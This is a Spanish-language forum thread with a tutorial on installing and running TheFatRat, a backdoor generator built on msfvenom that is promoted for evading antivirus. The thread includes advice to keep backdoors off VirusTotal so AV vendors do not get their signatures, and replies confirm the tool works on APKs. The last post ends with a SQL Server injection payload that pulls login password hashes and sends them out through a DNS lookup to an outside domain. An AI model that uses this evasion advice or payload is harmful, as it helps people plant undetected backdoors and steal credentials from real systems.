TheFatRat - Tutorial [1] - Que es? - Instalación - Ejecutarlo

Iniciado por puntoCL, Enero 15, 2017, 02:46:16 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 15, 2017, 02:46:16 AM Ultima modificación: Abril 28, 2017, 08:04:36 AM por puntoCL

TheFatRat






Este tutorial lo voy a dejar en stand by. estoy haciendo algo similar pero con metasploit

¿QUE ES TheFatRat?

En una forma mas sencilla de explicar esta herramienta que genera backdoor "payload" con msfvnom, "que es una parte de metasploit". se puede ejecutar en windows, android, mac. Esta herramienta tiene la capacidad de evadir los AV "anti-virus"




INSTALACIÓN

Escribimos los siguientes pasos en la consola

1.- git clone No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
2.- cd TehFatrat/Setup
3.- chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta && ./setup.sh

En el primer paso clonamos desde de github TheFatRat
En el segundo paso vamos a la carpeta "Setup" adentro de TheFatRat
y el tercer paso le damos permiso de ejecución y a la vez ejecutamos la instalación



Después no vas a chequear si tenemos instalado
- msfconsole -
- msfvenom -
- zenity -
- gcc compiler -
- mingw32 compiler -
- backdoor-factory -
- monodevelop -
- ruby -
- apache2 -

En caso que no lo tenemos instalado, TheFatRat automáticamente lo va a instalar



Ya una vez finalizada no aparecerá esto






EJECUTARLO

Ahora cuando ya tenemos todo listo nos falta abrir la herramienta para esto vamos a la carpeta de TheFatRat una vez ya adentro hacemos un "ls" para ver el contenido de la carpeta, y tenemos que ejecutar el segundo archivo llamado fatrat que no aparece en la imagen pero sale con letra color blanco



es por que no tiene permiso de ejecución, tenemos que darle el permiso a la igual que hicimos anteriormente con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta. en la consola escribimos

chmod +x fatrat
chmod +x No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

el archivo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta igual tenemos que darle permiso de ejecución, una vez terminado ahora se va a cambiar de color verde eso significa que ya están con el permiso de ejecución



y para finalizar escribimos

./fatrat

para ejecutar la herramienta




NOTA MENTAL



Si usted va verificar si su backdoor es detectable por los AV no lo suban a No tienes permitido ver los links. Registrarse o Entrar a mi cuenta por que VIRUSTOTAL tiene un contrato con las compañias de antivirus. cuando tu subes tu backdoor a virus total el archivo contiene una firma y esa firma se envia automaticamente a las compañias de antivirus y a los meses despues esa firma son detectada facilmente

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta




LATER

TheFatRat - Tutorial [2] - Generar backdoor con msfvenom para windows (.exe)
TheFatRat - Tutorial [3] - Generar backdoor con msfvenom en php
TheFatRat - Tutorial [4] - Generar backdoor con msfvenom en doc
TheFatRat - Tutorial [5] - Generar backdoor con msfvenom en rar
TheFatRat - Tutorial [6] - Ataque afuera de la red









Gracias, buen tutorial.

Como recomendacion, no usar "nodistribute"; Nod Is Tribute. Y no, no es casualidad, envia a NOD32. Comoa lternativa se puede usar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta o No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Mi blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si necesitas ayuda, no dudes en mandar MP

Excelente lo probe y funciona  solo eh testado  con apk

Enviado desde mi SM-G928T mediante Tapatalk

Ми повинні мати віру в себе. У цьому і полягає секрет. Навіть коли я був у дитячому будинку і ходили по вулицях у пошуках їжі, щоб жити, навіть тоді, я вважав найбільшим актором в світі. Без абсолютної впевненості, один приречена на провал.

Enero 16, 2017, 05:16:17 AM #3 Ultima modificación: Enero 16, 2017, 05:19:26 AM por manoverde
No consigo instalarla desde la terminal, estoy con Kali en Liveusb, me dice "No such file or directory" después de clonar lo, a ver si me podéis echar un cable 1000 gracias!!

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No consigo instalarla desde la terminal, estoy con Kali en Liveusb, me dice "No such file or directory" después de clonar lo, a ver si me podéis echar un cable 1000 gracias!!

Verifica las rutas

saludos





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No consigo instalarla desde la terminal, estoy con Kali en Liveusb, me dice "No such file or directory" después de clonar lo, a ver si me podéis echar un cable 1000 gracias!!

Verifica las rutas

saludos
Perfecto!
Ya me funciona, muchas gracias!
Ahora me falta dedicarle tiempo para probarla, aprender y entenderla.

La probaré mañana mismo.

Enviado desde mi XT1572 mediante Tapatalk


Increible herramienta, estare esperando el proximo tutorial.

Muy buen aporte  ;) !!
ahora mismo lo descargo , esperamos los proximios post con ansias  :) :)

Enero 30, 2017, 11:30:24 AM #9 Ultima modificación: Enero 30, 2017, 11:35:54 AM por 'or '1'=1
Código: bash
apt-get install mingw32 
git clone https://github.com/Screetsec/TheFatRat.git && cd TheFatRat
cd setup
bash setup.sh
chmod +x fatrat
./fatrat


1;declare @host varchar(800); select @host = name + '-' +
master.sys.fn_varbintohexstr(password_hash) + '.2.undisclosure.com' from
sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini''');--